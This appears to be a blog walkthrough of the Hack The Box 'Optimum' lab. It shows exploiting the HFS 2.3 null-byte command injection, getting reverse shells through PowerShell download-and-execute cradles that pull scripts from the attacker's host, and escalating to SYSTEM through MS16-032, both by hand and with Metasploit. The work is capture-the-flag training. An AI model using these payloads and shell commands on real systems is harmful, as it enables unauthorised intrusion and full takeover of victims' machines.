Table of Content

Home
Posts

Hack the Box Walkthrough Optimum

Hello everyone. Today, we're tackling the "Optimum" machine from Hack The Box. This is an interesting box because it shows how much easier things can get when a Metasploit module is released for a vulnerability.

About three years ago, this box required a bit more manual work. Now, it's quite straightforward with the right tools. To give you a full picture, we will approach this in two ways:

  1. The Manual Way: We will go from user to root completely without Metasploit, relying on PowerShell.
  2. The Optimum Way: We will then use Metasploit to see how quickly it can be done.

You'll see a big difference in the time it takes. The manual method might take around 20-25 minutes, while the Metasploit way could be done in just five. Let's begin.

Part 1: The Manual Path (Without Metasploit)

Step 1: Initial Reconnaissance

As always, we start with an Nmap scan to see what services are running on the target machine.

nmap -sC -sV -oA nmap 10.10.10.8

Let's break down the command:

  • -sC: Runs default Nmap scripts.
  • -sV: Tries to determine the version of the services running.
  • -oA nmap: Saves the output in all available formats with the filename "nmap".
  • 10.10.10.8: The IP address of the Optimum machine.

The scan results are simple:

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-14 23:55 EDT
Nmap scan report for 10.10.10.8
Host is up (0.19s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    HFS 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.49 seconds

Only port 80 is open, and it's running HFS 2.3, which stands for HTTP File Server. This is a common application, often used like Python's SimpleHTTPServer but for Windows.

Step 2: Finding a Foothold with HFS

Let's open the web server in a browser by navigating to http://10.10.10.8.

We see the HFS interface. At the bottom-left, the server information confirms it's version 2.3.

A quick search on Google for "http file server exploit" brings up several results, including a well-known vulnerability, CVE-2014-6287.

This vulnerability exists in the search function of HFS. The application uses an internal scripting language with special characters like {}, ., and |. It tries to filter these characters to prevent malicious commands. However, you can use a null byte (%00) to bypass this filter. The null byte tricks the application's regex filter into stopping early, allowing us to inject and execute commands.

To understand what commands we can run, we need to look at the HFS scripting documentation. A search for "HFS scripting" leads us to a wiki page. The command that catches our eye is exec, which is used for executing programs. The example looks like this: {.exec|notepad.}.

Now, let's confirm if we have Remote Command Execution (RCE). We will use Burp Suite to intercept and modify a search request.

  1. In your browser, with Burp intercepting, type anything into the search box and click the search button.
  2. Send the intercepted request to Burp Repeater (Ctrl+R).
  3. We will use a ping command to test for blind RCE. First, let's start tcpdump on our machine to listen for the incoming ping. 
    tcpdump -i tun0 -n icmp
  4. In Burp Repeater, modify the search request. The key is to add the null byte (%00) before our malicious script. The payload will execute a ping to our machine. Replace <YOUR_IP> with your own IP address. 
    GET /?search=%00{.exec|ping <YOUR_IP>.} HTTP/1.1
  5. Send the request. If you check your tcpdump window, you should see ICMP echo requests coming from the target machine.

Success! We have confirmed blind RCE.

Step 3: From RCE to User Shell

Now that we can execute commands, let's get a reverse shell. We'll use a PowerShell payload from the Nishang repository.

  1. Prepare the Payload: We'll use the Invoke-PowerShellTcp.ps1 script from Nishang. At the end of the script, add the function call to start the reverse shell. 
    Invoke-PowerShellTcp -Reverse -IPAddress <YOUR_IP> -Port 1337
  2. Host the Payload: In the directory where you saved the script, start a simple Python web server. 
    python -m SimpleHTTPServer 8000
  3. Start a Listener: Open a new terminal and start a Netcat listener to catch the incoming shell. 
    nc -lvnp 1337
  4. Execute the Payload: Go back to Burp Repeater. We will now craft a command to make the server download and execute our PowerShell script. We will use Invoke-Expression (aliased as IEX). The full command needs to be URL-encoded before sending. 
    C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object Net.WebClient).DownloadString('http://<YOUR_IP>:8000/Invoke-PowerShellTcp.ps1')"

After sending this payload through the search parameter, your Python server will receive a GET request, and your Netcat listener will connect to a PowerShell prompt. We are now in as the user kostas.

Step 4: Privilege Escalation with Sherlock

Our next goal is to become the SYSTEM user. First, let's gather information about the operating system.

systeminfo

The output shows it's a Windows Server 2012 R2 (64-bit) machine and lists all the installed hotfixes (patches). Instead of manually checking each one, we can use an automated script called Sherlock.ps1, which finds missing patches that could lead to privilege escalation.

  1. Download Sherlock.ps1 to your machine.
  2. Edit the script and add Find-AllVulns at the very end. This will automatically run the main function when the script is executed.
  3. Use the same IEX method as before to run Sherlock on the target machine. 
    IEX (New-Object Net.WebClient).DownloadString('http://<YOUR_IP>:8000/Sherlock.ps1')

Sherlock's output will show a list of potential vulnerabilities. One that stands out is MS16-032, a known privilege escalation vulnerability.

Step 5: Becoming SYSTEM

We need an exploit for MS16-032. The PowerShell Empire framework has a modified version of this exploit (Invoke-MS16032.ps1) that allows us to run a custom command instead of just popping a cmd.exe window.

  1. Prepare a New Shell Payload: Create a new PowerShell reverse shell script called shell.ps1. This time, set it to connect back to a different port, like 1338.
  2. Start a New Listener: Open another terminal and start a Netcat listener for the SYSTEM shell. 
    nc -lvnp 1338
  3. Execute the Exploit: From our user shell, we'll perform a two-step attack:
    • First, download and load the Invoke-MS16032.ps1 exploit into memory.
    • Second, run the exploit function, using its -Command parameter to execute our shell.ps1 payload.
    # Step 1: Load the exploit
IEX (New-Object Net.WebClient).DownloadString('http://<YOUR_IP>:8000/Invoke-MS16032.ps1')

# Step 2: Run the exploit with our reverse shell command
Invoke-MS16032 -Command "IEX (New-Object Net.WebClient).DownloadString('http://<YOUR_IP>:8000/shell.ps1')"

Your Python server will get requests for both scripts. Shortly after, your new Netcat listener on port 1338 will receive a connection. Run whoami to confirm.

C:\Users\kostas\Desktop> whoami
nt authority\system

We have successfully gained SYSTEM privileges manually.

Part 2: The Optimum Way (With Metasploit)

Now let's see how much faster this is with Metasploit.

Step 1: Initial Access

  1. Start msfconsole.
  2. Search for and use the HFS exploit. 
    msf > search rejetto
msf > use exploit/windows/http/rejetto_hfs_exec
  3. Set the required options. Since the initial exploit process is 32-bit, but the OS is 64-bit, we'll start with a 64-bit payload. Metasploit will handle the architecture compatibility. 
    msf exploit(windows/http/rejetto_hfs_exec) > set RHOST 10.10.10.8
msf exploit(windows/http/rejetto_hfs_exec) > set SRVHOST <YOUR_IP>
msf exploit(windows/http/rejetto_hfs_exec) > set payload windows/x64/meterpreter/reverse_tcp
  4. Run the exploit. 
    msf exploit(windows/http/rejetto_hfs_exec) > exploit

You will get a Meterpreter session.

Step 2: Privilege Escalation

The initial Meterpreter session is running in a 32-bit process. To use the MS16-032 exploit effectively within Metasploit, we should first migrate to a 64-bit process.

  1. List the running processes and find a stable 64-bit one, like explorer.exe. 
    meterpreter > ps
meterpreter > migrate <PID_of_explorer.exe>
  2. Once migrated, background the session and use the local_exploit_suggester. 
    meterpreter > background
msf > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set SESSION 2
msf post(multi/recon/local_exploit_suggester) > run
  3. The suggester might not find MS16-032, but since we already know it's vulnerable, we can use the exploit directly. 
    msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set SESSION 2
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > set LHOST <YOUR_IP>
msf exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > exploit

This will create a new Meterpreter session. Interact with it and check your privileges.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

And just like that, we are SYSTEM again, but much faster.

Conclusion

This box is a great example of two different penetration testing styles. The manual method forces you to understand each step of the attack chain, from the null byte injection to PowerShell scripting and privilege escalation. The Metasploit method demonstrates the power of automation and how it can drastically speed up the process.

I hope you enjoyed this walkthrough. Take care and see you next time.

Post a Comment

If you have any questions, feel free to ask here!